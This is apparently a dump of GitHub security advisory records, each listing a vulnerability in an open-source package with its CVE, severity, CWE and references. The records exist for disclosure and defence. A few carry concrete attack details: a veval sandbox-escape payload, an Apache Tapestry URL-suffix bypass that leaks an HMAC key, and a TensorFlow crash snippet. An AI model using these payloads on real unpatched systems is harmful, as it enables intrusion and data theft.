Remote attackers may delete arbitrary files in a system hosting a JSPWiki instance, versions up to 2.11.0.M8, by using a carefuly crafted http request on logout, given that those files are reachable to the user running the JSPWiki instance. Apache JSPWiki users should upgrade to 2.11.0 or later.
{'CVE-2021-44140'}
2021-11-30T14:44:45Z
2021-11-29T17:59:24Z
CRITICAL
9.1
{'CWE-276'}
{'https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2021-44140', 'https://nvd.nist.gov/vuln/detail/CVE-2021-44140', 'https://github.com/advisories/GHSA-8gw6-w5rw-4g5c', 'https://lists.apache.org/thread/5qglpjdhvobppx7j550lf1sk28f6011t'}
null
GHSA
GHSA-xpmx-h7xq-xffh
Potential access control security issue in apollo-adminservice
### Impact If users expose apollo-adminservice to internet(which is not recommended), there are potential security issues since apollo-adminservice is designed to work in intranet and it doesn't have built-in access control. Malicious hackers may access apollo-adminservice apis directly to access/edit the application's configurations. ### Patches Access control for admin service was added in #3233 and was released in [v1.7.1](https://github.com/ctripcorp/apollo/releases/tag/v1.7.1). ### Workarounds To fix the potential issue without upgrading, simply follow the advice that do not expose apollo-adminservice to internet. ### Credits [Lexu](https://github.com/lllllx) reported the issue and provided the required information to reproduce it. ### References [Apollo Security Guidence](https://github.com/ctripcorp/apollo/wiki/Apollo%E4%BD%BF%E7%94%A8%E6%8C%87%E5%8D%97#71-%E5%AE%89%E5%85%A8%E7%9B%B8%E5%85%B3) ### For more information If you have any questions or comments about this advisory: * Open an [issue](https://github.com/ctripcorp/apollo/issues) * Email to one of the active [project maintainers](https://github.com/ctripcorp/apollo/graphs/contributors)
{'CVE-2020-15170'}
2022-04-19T19:02:34Z
2020-10-02T16:33:41Z
HIGH
7
{'CWE-20'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-15170', 'https://github.com/ctripcorp/apollo/security/advisories/GHSA-xpmx-h7xq-xffh', 'https://github.com/ctripcorp/apollo/pull/3233/commits/ae9ba6cfd32ed80469f162e5e3583e2477862ddf', 'https://github.com/advisories/GHSA-xpmx-h7xq-xffh'}
null
GHSA
GHSA-hgmw-x865-hf9x
High severity vulnerability that affects arabic-prawn
lib/string_utf_support.rb in the Arabic Prawn 0.0.1 gem for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) downloaded_file or (2) url variable.
{'CVE-2014-2322'}
2022-04-19T19:03:25Z
2017-10-24T18:33:36Z
HIGH
0
null
{'https://github.com/advisories/GHSA-hgmw-x865-hf9x', 'http://www.vapid.dhs.org/advisories/arabic-ruby-gem.html', 'https://nvd.nist.gov/vuln/detail/CVE-2014-2322', 'http://www.openwall.com/lists/oss-security/2014/03/12/6', 'http://www.openwall.com/lists/oss-security/2014/03/10/8'}
null
GHSA
GHSA-54qm-37qr-w5wq
Sandbox Breakout / Arbitrary Code Execution in veval
All versions of `veval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
null
2020-09-04T15:04:20Z
2020-09-04T15:04:20Z
CRITICAL
0
null
{'https://www.npmjs.com/advisories/1321', 'https://github.com/advisories/GHSA-54qm-37qr-w5wq'}
null
GHSA
GHSA-r5hc-9xx5-97rw
Moderate severity vulnerability that affects i18n
Cross-site scripting (XSS) vulnerability in exceptions.rb in the i18n gem before 0.6.6 for Ruby allows remote attackers to inject arbitrary web script or HTML via a crafted I18n::MissingTranslationData.new call.
{'CVE-2013-4492'}
2021-09-17T14:34:46Z
2017-10-24T18:33:37Z
MODERATE
0
{'CWE-79'}
{'https://github.com/svenfuchs/i18n/commit/92b57b1e4f84adcdcc3a375278f299274be62445', 'http://weblog.rubyonrails.org/2013/12/3/Rails_3_2_16_and_4_0_2_have_been_released/', 'http://www.securityfocus.com/bid/64076', 'https://nvd.nist.gov/vuln/detail/CVE-2013-4492', 'https://groups.google.com/forum/message/raw?msg=ruby-security-ann/pLrh6DUw998/bLFEyIO4k_EJ', 'http://lists.opensuse.org/opensuse-updates/2013-12/msg00093.html', 'https://github.com/advisories/GHSA-r5hc-9xx5-97rw', 'http://www.debian.org/security/2013/dsa-2830'}
null
GHSA
GHSA-j858-xp5v-f8xx
Remote code execution in Dragonfly
An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
{'CVE-2021-33564'}
2021-06-11T13:19:25Z
2021-06-02T21:42:49Z
CRITICAL
9.8
{'CWE-88', 'CWE-94'}
{'https://github.com/markevans/dragonfly/issues/513', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33564', 'https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5', 'https://github.com/advisories/GHSA-j858-xp5v-f8xx', 'https://github.com/mlr0p/CVE-2021-33564', 'https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-33564.yaml', 'https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0', 'https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/'}
null
GHSA
GHSA-fqgw-6qj5-8hmp
Infinite Loop in Apache James
In Apache James, while fuzzing with Jazzer the IMAP parsing stack, we discover that crafted APPEND and STATUS IMAP command could be used to trigger infinite loops resulting in expensive CPU computations and OutOfMemory exceptions. This can be used for a Denial Of Service attack. The IMAP user needs to be authenticated to exploit this vulnerability. This affected Apache James prior to version 3.6.1. This vulnerability had been patched in Apache James 3.6.1 and higher. We recommend the upgrade.
{'CVE-2021-40111'}
2022-01-13T18:34:16Z
2022-01-08T00:40:37Z
MODERATE
0
{'CWE-835'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-40111', 'https://www.openwall.com/lists/oss-security/2022/01/04/3', 'https://github.com/advisories/GHSA-fqgw-6qj5-8hmp', 'http://www.openwall.com/lists/oss-security/2022/01/04/3'}
null
GHSA
GHSA-jphw-p3m6-pj3c
Data races in multiqueue2
An issue was discovered in the multiqueue2 crate before 0.1.7 for Rust. Because a non-Send type can be sent to a different thread, a data race can occur.
{'CVE-2020-36214'}
2021-08-25T20:51:54Z
2021-08-25T20:51:54Z
MODERATE
5.9
{'CWE-662'}
{'https://github.com/abbychau/multiqueue2/issues/10', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36214', 'https://github.com/advisories/GHSA-jphw-p3m6-pj3c', 'https://rustsec.org/advisories/RUSTSEC-2020-0106.html'}
null
GHSA
GHSA-q547-gmf8-8jr7
Signature Validation Bypass in goxmldsig
### Impact With a carefully crafted XML file, an attacker can completely bypass signature validation and pass off an altered file as a signed one. ### Patches A patch is available, all users of goxmldsig should upgrade to v1.1.0. ### For more information If you have any questions or comments about this advisory open an issue at https://github.com/russellhaering/goxmldsig
{'CVE-2020-15216'}
2022-04-19T19:02:35Z
2021-05-24T16:57:32Z
MODERATE
5.3
{'CWE-347'}
{'https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GUH33FPUXED3FHYL25BJOQPRKFGPOMS2/', 'https://github.com/advisories/GHSA-q547-gmf8-8jr7', 'https://github.com/russellhaering/goxmldsig/commit/f6188febf0c29d7ffe26a0436212b19cb9615e64', 'https://pkg.go.dev/github.com/russellhaering/goxmldsig?tab=overview', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15216', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZECBFD4M4PHBMBOCMSQ537NOU37QOVWP/'}
null
GHSA
GHSA-mj8x-cpr8-x39h
Remote code execution in Apache Tapestry
A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class` which contains a HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/` The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from ysoserial). Solution for this vulnerability: * For Apache Tapestry 5.4.0 to 5.6.2, upgrade to 5.6.3 or later. * For Apache Tapestry 5.7.0, upgrade to 5.7.1 or later.
{'CVE-2021-27850'}
2021-06-16T17:33:19Z
2021-06-16T17:33:19Z
CRITICAL
0
{'CWE-502', 'CWE-922'}
{'https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E', 'https://github.com/advisories/GHSA-mj8x-cpr8-x39h', 'https://security.netapp.com/advisory/ntap-20210528-0002/', 'http://www.openwall.com/lists/oss-security/2021/04/15/1', 'https://issues.apache.org/jira/browse/TAP5-2663', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27850'}
null
GHSA
GHSA-77hp-pfxw-4w63
Moderate severity vulnerability that affects org.codelibs.fess:fess
codelibs fess version before commit faa265b contains a XML External Entity (XXE) vulnerability in GSA XML file parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This attack appear to be exploitable via specially crafted GSA XML files. This vulnerability appears to have been fixed in after commit faa265b.
{'CVE-2018-1000822'}
2021-09-02T20:09:25Z
2018-12-20T22:02:09Z
CRITICAL
10
{'CWE-611'}
{'https://0dd.zone/2018/10/27/fess-XXE/', 'https://github.com/advisories/GHSA-77hp-pfxw-4w63', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000822', 'https://github.com/codelibs/fess/issues/1851'}
null
GHSA
GHSA-j84c-j8qm-g47r
The Admin UI in Apache Ranger before 0.5.1 does not properly handle authentication requests that lack a password
The Admin UI in Apache Ranger before 0.5.1 does not properly handle authentication requests that lack a password, which allows remote attackers to bypass authentication by leveraging knowledge of a valid username.
{'CVE-2016-0733'}
2022-04-27T13:41:42Z
2018-10-17T17:21:11Z
CRITICAL
9.8
{'CWE-287'}
{'https://mail-archives.apache.org/mod_mbox/ranger-dev/201602.mbox/%3CD2D9A4C5.114ECA%25vel@apache.org%3E', 'https://github.com/advisories/GHSA-j84c-j8qm-g47r', 'https://nvd.nist.gov/vuln/detail/CVE-2016-0733', 'http://www.securityfocus.com/bid/82871', 'https://issues.apache.org/jira/browse/RANGER-835', 'https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger'}
null
GHSA
GHSA-wph7-x527-w3h5
Missing Release of Resource after Effective Lifetime in Apache Tomcat
The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.
{'CVE-2021-42340'}
2022-04-22T15:41:40Z
2021-10-15T18:51:34Z
HIGH
7.5
{'CWE-772'}
{'https://security.netapp.com/advisory/ntap-20211104-0001/', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.debian.org/security/2021/dsa-5009', 'https://lists.apache.org/thread.html/r8097a2d1550aa78e585fc77e602b9046e6d4099d8d132497c5387784@%3Ccommits.myfaces.apache.org%3E', 'https://lists.apache.org/thread.html/r83a35be60f06aca2065f188ee542b9099695d57ced2e70e0885f905c%40%3Cannounce.tomcat.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-42340', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10379', 'https://github.com/advisories/GHSA-wph7-x527-w3h5', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
GHSA
GHSA-844m-cpr9-jcmh
Secure/signed cookies share secrets between sites in a multi-site application
### Impact This vulnerability impacts any Rails applications using `rails_multisite` alongside Rails' signed/encrypted cookies. Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application. ### Patches The issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.
{'CVE-2021-41263'}
2021-11-17T21:09:27Z
2021-11-15T17:54:01Z
MODERATE
6.2
{'CWE-200', 'CWE-565'}
{'https://github.com/advisories/GHSA-844m-cpr9-jcmh', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41263', 'https://github.com/discourse/rails_multisite/security/advisories/GHSA-844m-cpr9-jcmh', 'https://github.com/discourse/rails_multisite/commit/c6785cdb5c9277dd2c5ac8d55180dd1ece440ed0'}
null
GHSA
GHSA-jj6g-7j8p-7gf2
Cross-Site Scripting in bracket-template
All versions of `bracket-template` are vulnerable to stored cross-site scripting (XSS). This is exploitable when a variable passed in via a GET parameter is used in a template. ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time.
null
2021-08-04T20:20:04Z
2019-05-30T21:03:24Z
HIGH
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-jj6g-7j8p-7gf2', 'https://hackerone.com/reports/317125', 'https://www.npmjs.com/advisories/608'}
null
GHSA
GHSA-924m-4pmx-c67h
High severity vulnerability that affects pysaml2
pysaml2 version 4.4.0 and older accept any password when run with python optimizations enabled. This allows attackers to log in as any user without knowing their password.
{'CVE-2017-1000433'}
2021-09-07T20:34:39Z
2018-07-13T16:01:17Z
HIGH
8.1
{'CWE-287'}
{'https://lists.debian.org/debian-lts-announce/2021/02/msg00038.html', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00000.html', 'https://security.gentoo.org/glsa/201801-11', 'https://github.com/advisories/GHSA-924m-4pmx-c67h', 'https://github.com/rohe/pysaml2/issues/451', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000433'}
null
GHSA
GHSA-p8c3-7rj8-q963
ECDSA signature validation vulnerability by accepting wrong ASN.1 encoding in jsrsasign
### Impact Jsrsasign supports ECDSA signature validation which signature value is represented by ASN.1 DER encoding. This vulnerablity may accept a wrong ASN.1 DER encoded ECDSA signature such as: - wrong multi-byte ASN.1 length of TLV (ex. 0x820045 even though 0x45 is correct) - prepending zeros with ASN.1 INTEGER value (ex. 0x00000123 even though 0x0123 is correct) - appending zeros to signature of ASN.1 TLV (ex. 0x3082....1fbc000000 even though 0x3082....1fbc, appending zeros are ignored.) This vulnerability was fixed by strict ASN.1 DER checking. Here is an assessment of this vulnerability: - If you are not use ECDSA signature validation, this vulnerability is not affected. - Not ASN.1 format signature like just concatenation of R and S value is not affected such as Bitcoin. - This vulnerability is affected to all ECC curve parameters. - Risk to accept a forged or crafted message to be signed is low. - Risk to raise memory corruption is low since jsrsasign uses BigInteger class. - ECDSA signatures semantically the same to valid one may be accepted as valid. There are many malleable variants. As discussed [here](https://crypto.stackexchange.com/questions/24862/ber-or-der-x9-62-for-ecdsa-signature), there is no standards like X9.62 which requires ASN.1 DER. So ASN.1 BER can be applied to ECDSA however most of implementations like OpenSSL do strict ASN.1 DER checking. ### Patches Users using ECDSA signature validation should upgrade to 8.0.19. ### Workarounds Do strict ASN.1 DER checking for ASN.1 encoded ECDSA signature value. ### References https://nvd.nist.gov/vuln/detail/CVE-2020-14966 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14966 https://vuldb.com/?id.157123 https://github.com/kjur/jsrsasign/issues/437 https://kjur.github.io/jsrsasign/api/symbols/KJUR.crypto.ECDSA.html https://kjur.github.io/jsrsasign/api/symbols/ASN1HEX.html#.checkStrictDER https://www.itu.int/rec/T-REC-X.690
{'CVE-2020-14966'}
2021-10-06T22:01:37Z
2020-06-26T16:54:15Z
HIGH
7.5
{'CWE-347'}
{'https://github.com/advisories/GHSA-p8c3-7rj8-q963', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14966', 'https://kjur.github.io/jsrsasign/', 'https://github.com/kjur/jsrsasign/releases/tag/8.0.17', 'https://vuldb.com/?id.157123', 'https://github.com/kjur/jsrsasign/security/advisories/GHSA-p8c3-7rj8-q963', 'https://github.com/kjur/jsrsasign/issues/437', 'https://github.com/kjur/jsrsasign/releases/tag/8.0.18', 'https://github.com/kjur/jsrsasign/commit/6087412d072a57074d3c4c1b40bdde0460d53a7f', 'https://security.netapp.com/advisory/ntap-20200724-0001/', 'https://kjur.github.io/jsrsasign/api/symbols/KJUR.crypto.ECDSA.html', 'https://kjur.github.io/jsrsasign/api/symbols/ASN1HEX.html#.checkStrictDER', 'https://nvd.nist.gov/vuln/detail/CVE-2020-14966', 'https://www.npmjs.com/package/jsrsasign'}
null
GHSA
GHSA-25f5-gc4h-hc22
Improper Privilege Management in devise_masquerade
The devise_masquerade gem before 1.3 allows certain attacks when a password's salt is unknown. An application that uses this gem to let administrators masquerade/impersonate users loses one layer of security protection compared to a situation where Devise (without this extension) is used. If the server-side secret_key_base value became publicly known (for instance if it is committed to a public repository by mistake), there are still other protections in place that prevent an attacker from impersonating any user on the site. When masquerading is not used in a plain Devise application, one must know the password salt of the target user if one wants to encrypt and sign a valid session cookie. When devise_masquerade is used, however, an attacker can decide which user the "back" action will go back to without knowing that user's password salt and simply knowing the user ID, by manipulating the session cookie and pretending that a user is already masqueraded by an administrator.
{'CVE-2021-28680'}
2021-12-14T15:33:15Z
2021-12-08T19:55:30Z
HIGH
8.1
{'CWE-269'}
{'https://labanskoller.se/blog/2021/03/23/the-devise-extension-that-peeled-off-one-layer-of-the-security-onion-cve-2021-28680/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28680', 'https://github.com/oivoodoo/devise_masquerade/issues/83', 'https://github.com/advisories/GHSA-25f5-gc4h-hc22', 'https://github.com/oivoodoo/devise_masquerade/releases/tag/v1.3.1', 'https://github.com/oivoodoo/devise_masquerade/pull/76'}
null
GHSA
GHSA-86p3-4gfq-38f2
Denial of Service in url-relative
All versions of `url-relative` are vulnerable to Denial of Service. If the values `to` and `from` are equal, the function hangs and never returns. This may cause a Denial of Service. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
null
2021-08-04T21:31:03Z
2019-06-05T14:10:34Z
MODERATE
5.9
{'CWE-400'}
{'https://github.com/junosuarez/url-relative/issues/3', 'https://www.npmjs.com/advisories/783', 'https://github.com/advisories/GHSA-86p3-4gfq-38f2', 'https://snyk.io/vuln/SNYK-JS-URLRELATIVE-173691'}
null
GHSA
GHSA-r38r-qp28-2m63
Critical severity vulnerability that affects rope
base/oi/doa.py in the Rope library in CPython (aka Python) allows remote attackers to execute arbitrary code by leveraging an unsafe call to pickle.load.
{'CVE-2014-3539'}
2022-03-23T20:45:02Z
2018-07-26T16:08:49Z
CRITICAL
9.8
null
{'https://nvd.nist.gov/vuln/detail/CVE-2014-3539', 'https://bugzilla.redhat.com/show_bug.cgi?id=1116485', 'https://github.com/advisories/GHSA-r38r-qp28-2m63', 'http://www.openwall.com/lists/oss-security/2015/02/07/1', 'https://github.com/python-rope/rope/commit/b01da7aab5cd02129941d2a900e6e5e3b5f7d4fb'}
null
GHSA
GHSA-27fj-mc8w-j9wg
RSA signature validation vulnerability on maleable encoded message in jsrsasign
### Impact Vulnerable jsrsasign will accept RSA signature with improper PKCS#1.5 padding. Decoded RSA signature value consists following form: 01(ff...(8 or more ffs)...ff)00[ASN.1 OF DigestInfo] Its byte length shall be the same as RSA key length however such checking was not sufficient. To make crafted message for practical attack is very hard. ### Patches Users validating RSA signature should upgrade to 10.2.0 or later. ### Workarounds There is no workaround. Not to use RSA signature validation in jsrsasign. ### ACKNOWLEDGEMENT Thanks to Daniel Yahyazadeh @yahyazadeh for reporting and analyzing this vulnerability.
{'CVE-2021-30246'}
2021-04-22T14:32:46Z
2021-04-16T19:52:35Z
CRITICAL
9.1
{'CWE-347'}
{'https://kjur.github.io/jsrsasign/', 'https://github.com/kjur/jsrsasign/releases/tag/10.1.13', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30246', 'https://github.com/advisories/GHSA-27fj-mc8w-j9wg', 'https://github.com/kjur/jsrsasign/security/advisories/GHSA-27fj-mc8w-j9wg', 'https://github.com/kjur/jsrsasign/issues/478'}
null
GHSA
GHSA-3q5x-7mxp-rp6j
Remote code execution via vulnerable Symphony dependecy injection
A remote code execution vulnerability exists in Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3 or 2.3.2-p1. Dependency injection through Symphony framework allows service identifiers to be derived from user controlled data, which can lead to remote code execution.
{'CVE-2019-8135'}
2021-08-18T22:23:57Z
2019-11-12T22:59:32Z
CRITICAL
9.8
{'CWE-74'}
{'https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update', 'https://nvd.nist.gov/vuln/detail/CVE-2019-8135', 'https://github.com/advisories/GHSA-3q5x-7mxp-rp6j', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8135.yaml'}
null
GHSA
GHSA-fcwc-p4fc-c5cc
Null pointer dereference in `MatrixDiagPartOp`
### Impact If a user does not provide a valid padding value to `tf.raw_ops.MatrixDiagPartOp`, then the code triggers a null pointer dereference (if input is empty) or produces invalid behavior, ignoring all values after the first: ```python import tensorflow as tf tf.raw_ops.MatrixDiagPartV2( input=tf.ones(2,dtype=tf.int32), k=tf.ones(2,dtype=tf.int32), padding_value=[]) ``` Although this example is given for `MatrixDiagPartV2`, all versions of the operation are affected. The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/linalg/matrix_diag_op.cc#L89) reads the first value from a tensor buffer without first checking that the tensor has values to read from. ### Patches We have patched the issue in GitHub commit [482da92095c4d48f8784b1f00dda4f81c28d2988](https://github.com/tensorflow/tensorflow/commit/482da92095c4d48f8784b1f00dda4f81c28d2988). The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-37643'}
2021-08-25T14:43:42Z
2021-08-25T14:43:42Z
HIGH
7.7
{'CWE-476'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fcwc-p4fc-c5cc', 'https://github.com/advisories/GHSA-fcwc-p4fc-c5cc', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37643', 'https://github.com/tensorflow/tensorflow/commit/482da92095c4d48f8784b1f00dda4f81c28d2988'}
null
GHSA
GHSA-77gc-fj98-665h
Signature Validation Bypass
Go JOSE before 1.1.0 suffers from multiple signatures exploitation. The go-jose library supports messages with multiple signatures. However, when validating a signed message the API did not indicate which signature was valid, which could potentially lead to confusion. For example, users of the library might mistakenly read protected header values from an attached signature that was different from the one originally validated.
{'CVE-2016-9122'}
2021-05-18T19:15:09Z
2021-05-18T19:15:09Z
HIGH
7.5
{'CWE-284'}
{'http://www.openwall.com/lists/oss-security/2016/11/03/1', 'https://nvd.nist.gov/vuln/detail/CVE-2016-9122', 'https://github.com/square/go-jose/pull/111', 'https://github.com/advisories/GHSA-77gc-fj98-665h', 'https://hackerone.com/reports/169629', 'https://github.com/square/go-jose/commit/2c5656adca9909843c4ff50acf1d2cf8f32da7e6'}
null
GHSA
GHSA-6w62-hx7r-mw68
XStream is vulnerable to an Arbitrary Code Execution attack
### Impact The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. ### Patches XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. ### Workarounds See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. ### References See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39154](https://x-stream.github.io/CVE-2021-39154.html). ### Credits ka1n4t found and reported the issue to XStream and provided the required information to reproduce it. ### For more information If you have any questions or comments about this advisory: * Open an issue in [XStream](https://github.com/x-stream/xstream/issues) * Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)
{'CVE-2021-39154'}
2022-04-22T15:42:03Z
2021-08-25T14:46:38Z
HIGH
8.5
{'CWE-434', 'CWE-502'}
{'https://x-stream.github.io/CVE-2021-39154.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://github.com/advisories/GHSA-6w62-hx7r-mw68', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39154', 'https://www.debian.org/security/2021/dsa-5004', 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html', 'https://security.netapp.com/advisory/ntap-20210923-0003/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/', 'https://github.com/x-stream/xstream/security/advisories/GHSA-6w62-hx7r-mw68', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
GHSA
GHSA-jh2g-xhqq-x4w9
Send/Sync bound needed on T for Send/Sync impl of RcuCell<T>
Affected versions of this crate unconditionally implement Send/Sync for `RcuCell<T>`. This allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell<T>`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell<T>` that provide access to `&T`. This can result in memory corruption caused by data races.
null
2021-08-25T21:00:07Z
2021-08-25T21:00:07Z
MODERATE
0
{'CWE-362'}
{'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2', 'https://github.com/advisories/GHSA-jh2g-xhqq-x4w9', 'https://rustsec.org/advisories/RUSTSEC-2020-0131.html', 'https://github.com/Xudong-Huang/rcu_cell/issues/3'}
null
GHSA
GHSA-5v3f-73gv-x7x5
cairo is vulnerable to denial of service due to a null pointer dereference
Cairo version 1.15.4 is vulnerable to a NULL pointer dereference related to the FT_Load_Glyph and FT_Render_Glyph resulting in an application crash.
{'CVE-2017-7475'}
2022-04-25T20:55:53Z
2017-11-15T20:41:14Z
MODERATE
5.5
{'CWE-476'}
{'https://bugs.freedesktop.org/show_bug.cgi?id=100763', 'https://github.com/advisories/GHSA-5v3f-73gv-x7x5', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7475', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7475', 'http://seclists.org/oss-sec/2017/q2/151', 'https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E'}
null
GHSA
GHSA-gj26-g5qf-jrh7
Cross-site Scripting in librenms
Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
{'CVE-2022-0589'}
2022-02-24T13:06:11Z
2022-02-16T00:01:51Z
MODERATE
5.4
{'CWE-79'}
{'https://github.com/advisories/GHSA-gj26-g5qf-jrh7', 'https://github.com/librenms/librenms/commit/4c9d4eefd8064a0285f9718ef38f5617d7f9d6fa', 'https://huntr.dev/bounties/d943d95c-076f-441a-ab21-cbf6b15f6768', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0589', 'https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html'}
null
GHSA
GHSA-q6j2-g8qf-wvf7
Verification check bypass in Gate One
An issue in Gate One 1.2.0 allows attackers to bypass to the verification check done by the origins list and connect to Gate One instances used by hosts not on the origins list.
{'CVE-2020-19003'}
2021-10-12T22:34:28Z
2021-10-12T22:34:28Z
MODERATE
0
null
{'https://github.com/advisories/GHSA-q6j2-g8qf-wvf7', 'https://nvd.nist.gov/vuln/detail/CVE-2020-19003', 'https://github.com/liftoff/GateOne/issues/728'}
null
GHSA
GHSA-ffhg-7mh4-33c4
Improper Verification of Cryptographic Signature in golang.org/x/crypto
golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.
{'CVE-2020-9283'}
2022-01-04T19:50:38Z
2021-05-18T15:29:31Z
MODERATE
7.5
{'CWE-347'}
{'https://lists.debian.org/debian-lts-announce/2020/11/msg00031.html', 'https://lists.debian.org/debian-lts-announce/2020/11/msg00027.html', 'https://groups.google.com/forum/#!topic/golang-announce/3L45YRc91SY', 'https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9283', 'https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236', 'http://packetstormsecurity.com/files/156480/Go-SSH-0.0.2-Denial-Of-Service.html', 'https://www.exploit-db.com/exploits/48121', 'https://github.com/advisories/GHSA-ffhg-7mh4-33c4'}
null
GHSA
GHSA-4jf5-jggp-g56j
Cross-Site Request Forgery in com.softwaremill.akka-http-session:core_2.12
